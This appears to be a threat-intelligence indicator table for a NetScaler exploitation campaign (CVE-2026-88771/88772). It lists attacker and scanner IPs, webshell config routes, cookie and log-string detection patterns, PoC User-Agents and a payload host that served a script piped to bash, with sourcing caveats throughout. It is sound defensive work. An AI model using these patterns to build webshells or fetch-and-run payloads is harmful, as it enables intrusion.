IPv4153.75.82.220eSentire TRU [48]; GreyNoise tag [56]; Arctic Wolf [36]Exploitation source (eSentire); also tagged by GreyNoise; Arctic Wolf: served /download/x.sh, piped to basheSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
IPv4216.203.21.233eSentire TRU [48]; GreyNoise tag [56]Exploitation source (eSentire); also tagged by GreyNoiseeSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
IPv4185.243.41.247eSentire TRU [48]Campaign infrastructure (eSentire)eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
NetworkUDP/443 (DTLSv1.0)Google GTIG / Mandiant [34]Delivery protocol for the CVE-2026-88772 exploit (GTIG)Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Legitimate DTLS VPN traffic uses the same port; baseline normal DTLS sources.Public blog, no TLP marking
Config directiveAlias /logon/LogonPoint/custom/receiver.min.cssBeazley Security Labs [49]; GreyNoise blog [53]httpd.conf route to the .ctxs.receiver webshell (GreyNoise, via Beazley)Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own.Public advisory, no TLP marking
Config directiveAliasMatch ^/logon/LogonPoint/custom/receiver\.min\.[0-9a-f]+\.css$Beazley Security Labs [49]; GreyNoise blog [53]httpd.conf route variant to the webshell (GreyNoise, via Beazley)Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own.Public advisory, no TLP marking
Config directivephp_flag engine on (changed from off) plus a SetHandler block for the webshell fileBeazley Security Labs [49]; CERT-EU [27]PHP enabled for the webshell in httpd.conf (GreyNoise, CERT-EU, via Beazley)Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own. Compare /etc/httpd.conf with a clean appliance on the same build.Public advisory, no TLP marking
HTTP cookieCsrfToken + NSC_TASSBeazley Security Labs [49]; IFIN [57]Cookies used to access the .ctxs.receiver webshell (GreyNoise, via Beazley)NetScaler uses both cookies legitimately. Suspicious only when NSC_TASS carries URL-encoded commands on requests to the webshell path.Public advisory, no TLP marking
Log stringpitboss log lines containing IFS or b64decodeBeazley Security Labs [49]Log-poisoning exploitation of CVE-2026-88771 (Beaumont, via Beazley); check ns.log, /var/log/messages and your SIEMHunting lead compiled by Beazley Security Labs; not proof of compromise on its own.Public advisory, no TLP marking
Log string"missed too many heartbeats" or "unexpectedly died" in authentication log linesBeazley Security Labs [49]; CERT-EU [27]; Arctic Wolf [36]; Sygnia [37]Crafted login usernames imitating packet-engine messages (watchTowr, CERT-EU, via Beazley); ns.logHunting lead compiled by Beazley Security Labs; not proof of compromise on its own.Public advisory, no TLP marking
User-Agentns-88771-pocBeazley Security Labs [49]Public PoC/scanner User-Agent seen by Lupovis (via Beazley); Apache access logsA public testing tool, not an actor indicator. Means someone tested the box.Public advisory, no TLP marking
User-AgentPoCbitPoppelgaard [39]Scanner User-Agent listed alongside ns-88771-poc in the Poppelgaard checker v1.11 log hunt (source of the value not stated there); Apache access logsA testing-tool marker, not an actor indicator. A hit means someone ran a PoC or scanner against the box, possibly a researcher or defender.Public GitHub repository, no TLP marking
File path/var/tmp/wtw888*Poppelgaard [39]; watchTowr Detection Artefact Generator [29]; watchTowr Detection Artefact Generator [31]Output marker glob from the Poppelgaard checker v1.11 for files written by exploit payloads and PoC tools (alongside /var/tmp/watchTowr*, /tmp/wtw*, /tmp/boom*, nx_verify.html, id009*)Pattern from a public triage script, not a vendor report. The watchTowr tools document /var/tmp/watchTowr and /tmp/watchTowr as their example outputs; a wtw* hit means a PoC-class tool or payload ran on the box, and /tmp is in memory so it clears on reboot.Public GitHub repository, no TLP marking
IPv478.128.113.10Poppelgaard [39]Exploitation-attempt source per the GreyNoise-era list compiled from the public GreyNoise, Marius Sandbu and Lupovis releases (28-29 Sep), carried in the Poppelgaard checker. WHOIS: RACKWEB-NET, Miti 2000 EOOD. VirusTotal: 4 of 91 engines malicious, 3 suspicious (2 Oct)Single compiled list; the checker does not state which source observed this specific IP, and no public source describes what it did. A hunting lead, not proof of targeting.Public GitHub repository, no TLP marking
IPv4158.94.209.12Poppelgaard [39]Download server or sender per Gotham Technology Group, shared with permission and carried in the Poppelgaard checker. WHOIS: OMEGATECH, Omegatech LTD. VirusTotal: 12 of 91 engines malicious (2 Oct)Gotham IR observation shared with permission, relayed via the checker. Attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host.Public GitHub repository, no TLP marking
IPv438.134.148.238Poppelgaard [39]Tied to the 2 Oct activity, shared in the NetScaler community and carried in the Poppelgaard checker's GreyNoise-tagged probe group. WHOIS: Cogent Communications. VirusTotal: 2 of 91 engines malicious, 2 suspicious (3 Oct)Community-shared via the checker; the checker itself groups it as scanner noise, and no public source describes what it did or links it to the campaign first-hand. A hunting lead, not a confirmed attacker address; not in this site's firewall blocklist.Public GitHub repository, no TLP marking
IPv4167.148.88.236Poppelgaard [39]Tied to the 2 Oct activity, shared in the NetScaler community and carried in the Poppelgaard checker's GreyNoise-tagged probe group. WHOIS: RIPE allocation, netname NET-167-148-88-0-24 (Ultahost, New York per PTR range data). VirusTotal: 1 of 91 engines malicious, 1 suspicious (3 Oct)Community-shared via the checker; the checker itself groups it as scanner noise, and no public source describes what it did or links it to the campaign first-hand. A hunting lead, not a confirmed attacker address; not in this site's firewall blocklist.Public GitHub repository, no TLP marking
IPv45.188.206.226Poppelgaard [39]Download server or sender per Gotham Technology Group, shared with permission and carried in the Poppelgaard checker. WHOIS: TAIL-NET, Technology Advanced Investment Limited. VirusTotal: 0 of 91 engines malicious, 1 suspicious (2 Oct)Gotham IR observation shared with permission, relayed via the checker. Attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host. Low VirusTotal score does not prove safety.Public GitHub repository, no TLP marking
StringNX-CVE-OKBeazley Security Labs [49]Test-marker text dropped in web folders by exploitation checks (Lupovis, via Beazley); grep /netscaler/ns_guiMeans the box was reached and is exploitable, not necessarily backdoored.Public advisory, no TLP marking
File permission/bin/sh expected -r-xr-xr-x (setuid means modified)Beazley Security Labs [49]; Google GTIG / Mandiant [34]Check with ls -l /bin/sh before patching; the installer sets setuid (Beazley, GTIG)Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own.Public advisory, no TLP marking
IPv4172.247.44.85GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CNSERVERS LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4165.227.201.112GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4173.231.39.244GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (WebNX, Inc., United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv464.225.103.14GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, Germany)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4159.65.104.231GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4142.93.205.229GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4182.101.54.57GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv487.224.84.82GreyNoise tag [56]; LevelBlue SpiderLabs (THOR team) [42]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Spitfire Network Services Limited, United Kingdom). LevelBlue: source of a configuration-staging attemptOpportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. LevelBlue also lists it from its own THOR hunt, not independently confirmed.GreyNoise Visualizer tag search, viewed Sep 29
IPv4137.220.53.135GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (The Constant Company, LLC, Canada)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4120.28.233.211GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Globe Telecoms, Philippines)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4149.28.58.71GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (The Constant Company, LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv423.234.111.22GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (tzulo, inc., United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4198.13.159.233GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (BL Networks, Netherlands)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv485.221.203.85GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (INEA sp. z o.o., Poland)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv446.150.68.55GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Kyivski Telekomunikatsiyni Merezhi, Ukraine)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4159.26.103.184GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Proton AG, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv445.249.89.172GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (SpeedyPage Ltd, Japan)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4197.52.9.138GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (TE-AS, Egypt)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4180.242.113.168GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (PT Telekomunikasi Indonesia, Indonesia)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv485.117.117.248GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Mobile Telecom-Service LLP, Kazakhstan)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv473.43.85.7GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Comcast Cable Communications, LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv488.180.103.22GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Free SAS, France)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4194.28.195.90GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Dialog-K LLC, Russia)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv495.63.246.50GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Vodafone Espana S.A.U., Spain)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv431.13.192.160GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (SKAT POPOVO Ltd., Bulgaria)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4185.170.55.89GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (LLC Electron-Telecom, Russia)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4104.203.50.26GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Blue Stream, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv437.19.221.171GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Datacamp Limited, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv445.143.167.96GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (BlueVPS OU, Netherlands)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4206.232.71.215GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Leaseweb Deutschland GmbH, Germany)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4130.94.106.141GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (LIGHT NODE LIMITED, Argentina)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv458.187.56.89GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (FPT Telecom Company, Vietnam)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4171.106.10.118GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv482.24.212.15GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Shock Hosting LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4178.66.43.241GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (PJSC Rostelecom, Russia)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4185.209.15.246GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (ESTOXY OU, Netherlands)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv494.190.77.195GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (INTERRA telecommunications group, Ltd., Russia)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv493.177.60.233GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (PJSC Rostelecom, Russia)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv468.46.140.222GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Comcast Cable Communications, LLC, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4178.218.40.232GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (ATEXS PLUS Ltd., Russia)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv449.36.107.103GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Reliance Jio Infocomm Limited, India)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4191.37.30.194GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (WRNET LTDA, Brazil)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv423.234.74.48GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (tzulo, inc., United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv472.73.231.73GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Verizon Business, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv495.229.84.239GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Telecom Italia S.p.A., Italy)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv4113.137.102.68GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv447.243.125.255GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv447.76.92.109GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv48.217.173.25GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv48.210.67.91GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv447.239.205.29GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv447.76.132.65GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv48.218.219.56GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv447.76.102.1GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv447.76.63.52GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv48.210.119.74GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv464.177.93.71GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (The Constant Company, LLC, Mexico)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv444.252.255.141GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Amazon.com, Inc., United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4194.242.130.193GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (WAHYU, Hong Kong)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
